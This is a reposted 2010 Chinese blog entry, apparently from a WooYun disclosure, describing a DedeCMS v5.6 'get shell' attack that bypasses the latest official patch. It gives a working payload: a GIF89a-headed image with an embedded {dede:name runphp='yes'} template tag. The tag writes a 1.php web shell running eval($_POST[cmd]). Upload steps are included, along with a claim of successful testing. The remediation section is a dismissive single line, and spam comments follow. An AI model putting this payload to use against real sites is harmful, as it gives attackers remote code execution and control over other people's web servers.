DEDECMS v5.6 get shell(破官方最新补丁)

2010-11-26 王健宇 转载

已在wooyun 证实:http://www.wooyun.org/bugs/wooyun-2010-0871
原漏洞:http://www.oldjun.com/blog/index.php/archives/70/

现在其基础上,修改图片代码实现最新版本补丁突破。
找一张图片,在保留图片代码的同时,插入如下代码现在其基础上,修改图片代码实现最新版本补丁突破。
找一张图片,在保留图片代码的同时,插入如下代码
GIF89aGIF89a {dede:name runphp='yes'}
$fp = @fopen("1.php", 'a');
@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");
@fclose($fp);
{/dede:name}

如图,

点击查看原图

保存为1.gif
 

漏洞证明:

参考原漏洞自己构造一个表单,加上验证码,上传的时候图片虽为白页面,但文件成功传上,下载官方最新版,在自搭建环境测试成功!
 

修复方案:

过滤不严..你懂的...


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

评论:

uggs on sale
2010-12-02 10:54
这DEDECMS的内容,还真是看不懂了,呵呵……挺想知道里面的具体内容,可是不专业
王健宇
2010-12-02 11:56
@uggs on sale:。。。额
一起囧吧
2010-11-26 17:40
DEDECMS的0DAY?
王健宇
2010-11-26 18:42
@一起囧吧:嗯
cheap coach purses
2010-11-26 15:09
有点小专业了,哎其实建宇你一看就知道我来加链接的,你大人大量别删哈。都不容易。我会继续顶你给你加人气的!
王健宇
2010-11-26 16:11
@cheap coach purses:恩,以后都不删了。只要别发的鸟语,别发支持,顶之类无意义的评论就行

发表评论:

Powered by emlog sitemap